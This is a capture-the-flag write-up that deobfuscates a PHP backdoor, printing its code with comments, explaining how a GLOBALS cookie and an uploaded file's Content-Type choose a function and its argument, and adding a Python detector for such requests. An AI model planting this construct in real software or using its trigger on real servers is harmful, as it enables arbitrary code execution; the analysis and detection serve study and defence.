J0nas is a simple man. He specializes in only one thing: Building the most beautiful back doors that you’ve ever seen. This gem was used in multiple saloons, letting only the most skilled c0wb0ys pass. https://wildwildweb.fluxfingers.net:1425/index.php index.phps
Writeup
In this challenge, the source code was provided directly in the description and revealed a tricky backdoor.
At first glance it seemed very complex, but expanding and commenting it helped a lot!
After some time spent on analysis I obtained this code:
@$GLOBALS=
$GLOBALS{next}=
next( $GLOBALS{'GLOBALS'} ) //This moves the global array's pointer from _GET to _POST
[
    $GLOBALS['next']['next'] = //This creates a variable $next with content: array( 'next' ) = $_COOKIE['GLOBALS']. See the following lines for details
    next( $GLOBALS ) //This moves the global array's pointer from _POST to _COOKIE
    ['GLOBALS'] //This gets $_COOKIE['GLOBALS']
][
    $next['GLOBALS']= //This creates a new element in $next with index GLOBALS and value $_FILES[$_COOKIE['GLOBALS']]. See the following lines for details
    next( $GLOBALS[GLOBALS]['GLOBALS'] ) //This moves the global array's pointer from _COOKIE to _FILES
    [ $next['next'] ] //This gets $_FILES[$_COOKIE['GLOBALS']]
][
    $next['GLOBALS']=next($next['GLOBALS']) //This moves the array pointer on $next['GLOBALS'], that is $_FILES[$_COOKIE['GLOBALS']], from the 'name' key to the 'type' key
][
    $GLOBALS[next]['next'] //This uses $next['next'] (that is $_COOKIE['GLOBALS']) as the function
    (
        $GLOBALS['next']{'GLOBALS'} //This uses $next['GLOBALS'], that is $_FILES[$_COOKIE['GLOBALS']]['type'], as the argument
    )
]=next(neXt(${'next'}['next'])); //This isn't useful
After this analysis it became clear that a cookie named GLOBALS defines the name of a function to call, and the Content-Type of an uploaded file whose field name is that same function name defines the argument for that function.
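The calling convention described above can be matched on the defensive side. The following is an added detection sketch, not code from the challenge or the original writeup: it flags a request whose GLOBALS cookie value equals the field name of an uploaded file and reports whether the part's declared Content-Type is a well-formed MIME type. The function names, the `xyz` boundary and the sample requests are constructed assumptions with benign values.

```python
import re
from email import message_from_bytes
from http.cookies import SimpleCookie

# A legitimate upload declares "type/subtype"; the backdoor reads this field as an argument.
MIME_RE = re.compile(r"^[A-Za-z0-9][\w!#$&^.+-]*/[A-Za-z0-9][\w!#$&^.+-]*$")

def backdoor_trigger(cookie_header, content_type, body):
    """Return a finding if the request matches the backdoor's calling convention, else None."""
    cookies = SimpleCookie()
    cookies.load(cookie_header or "")
    if "GLOBALS" not in cookies:
        return None
    func = cookies["GLOBALS"].value
    # Re-attach the request Content-Type so the stdlib MIME parser can split the parts.
    head = b"Content-Type: " + (content_type or "").encode() + b"\r\n\r\n"
    msg = message_from_bytes(head + body)
    if not msg.is_multipart():
        return None
    for part in msg.get_payload():
        if part.get_filename() is None:   # plain form field, never reaches $_FILES
            continue
        field = part.get_param("name", header="content-disposition")
        if field != func:                 # the backdoor indexes $_FILES by the cookie value
            continue
        declared = (part.get("Content-Type") or "").strip()
        return {"function": func, "argument": declared,
                "valid_mime": bool(MIME_RE.match(declared.split(";")[0].strip()))}
    return None

# Constructed sample requests (benign values, not captured traffic).
CT = "multipart/form-data; boundary=xyz"

def make_upload(field, part_type):
    """Build a one-part multipart body with the given field name and part Content-Type."""
    return (b'--xyz\r\nContent-Disposition: form-data; name="' + field.encode()
            + b'"; filename="a.txt"\r\nContent-Type: ' + part_type.encode()
            + b"\r\n\r\nhello\r\n--xyz--\r\n")

SUSPICIOUS = ("GLOBALS=strrev; session=abc", CT, make_upload("strrev", "not-a-mime-type"))
BENIGN = ("session=abc", CT, make_upload("avatar", "image/png"))

if __name__ == "__main__":
    print(backdoor_trigger(*SUSPICIOUS))
    print(backdoor_trigger(*BENIGN))
```

A cookie literally named GLOBALS is unusual enough in normal traffic to alert on by itself; the field-name match and the malformed Content-Type raise confidence in the finding.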